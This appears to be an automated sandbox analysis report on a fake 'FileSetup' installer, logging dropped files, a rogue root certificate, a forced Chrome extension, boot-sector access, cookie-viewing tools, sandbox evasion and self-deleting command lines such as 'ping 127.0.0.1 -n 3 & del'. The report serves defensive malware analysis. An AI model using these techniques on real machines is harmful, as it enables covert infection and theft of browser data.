Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: FileSetup-v17.04.41.exeVirustotal: Detection: 60%
Source: FileSetup-v17.04.41.exeReversingLabs: Detection: 47%
Source: FileSetup-v17.04.41.exeString found in binary or memory: set-addPolicy
Source: FileSetup-v17.04.41.exeString found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile read: C:\Users\user\Desktop\FileSetup-v17.04.41.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\FileSetup-v17.04.41.exe 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\1611946678493.exe 'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Process created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Process created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Install
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: FileSetup-v17.04.41.exe | Static file information: File size 4592400 > 1048576
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: FileSetup-v17.04.41.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.4.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611946678493.exe, 0000000B.00000000.271662434.000000000040F000.00000002.00020000.sdmp, 1611946678493.exe.4.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.4.dr
Source: Binary string: atl71.pdbT source: atl71.dll.4.dr
Source: Binary string: atl71.pdb source: atl71.dll.4.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.4.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.4.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.4.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.4.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001D.00000000.367402647.0000000000BFC000.00000002.00020000.sdmp, ThunderFW.exe.4.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.4.dr
Source: Binary string: e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kinst_exe.pdb source: FileSetup-v17.04.41.exe
Source: Binary string: msvcr71.pdb source: msvcr71.dll.4.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Unpacked PE file: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 1_2_004560A0
Source: FileSetup-v17.04.41.exe | Static PE information: real checksum: 0x1332e9 should be: 0x469e0d
Source: MSI61C2.tmp.2.dr | Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 6852B33702F6B3BD.exe.1.dr | Static PE information: real checksum: 0x1332e9 should be: 0x469e0d
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00494DD9 push ebx; ret 1_2_00494DF6
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00494DF0 push ebx; ret 1_2_00494DF6
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00494E3E push ebx; ret 1_2_00494E3F
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00494EA5 push ebx; ret 1_2_00494EAA
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0049706C push ecx; ret 1_2_0049707F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 2_2_07A5DD20 push 00000078h; ret 2_2_07A5DD22
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10010579 push ecx; ret 4_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040E2F1 push ecx; ret 11_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040E340 push eax; ret 11_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Code function: 11_2_0040E340 push eax; ret 11_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 29_2_00BF3FB5 push ecx; ret 29_2_00BF3FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Roaming\1611946678493.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | File created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI61C2.tmp
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 1_2_004560A0
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611946678493.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100204C0 4_2_100204C0
Uses ping.exe to sleep
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 4_2_10019780
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_100204C0 4_2_100204C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe TID: 5276 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe TID: 5596 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe TID: 3544 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_004C2B17 __getdrive,FindFirstFileA,_strlen,_IsRootUNCName,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,___dtoxmode,GetLastError,FindClose, 1_2_004C2B17
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | Code function: 4_2_1001A170 FindFirstFileA,FindClose, 4_2_1001A170
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_0041E22C GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, 1_2_0041E22C
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe | Code function: 1_2_00412C23 GetCurrentProcess,GetModuleHandleW,GetModuleHandleW,GetProcAddress,_memset,GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo, 1_2_00412C23
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304732625.0000000003CE5000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 6852B33702F6B3BD.exe, 00000004.00000003.259627838.0000000002241000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.262107276.00000000021E1000.00000004.00000001.sdmp | Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.286862593.0000000003CC3000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter}
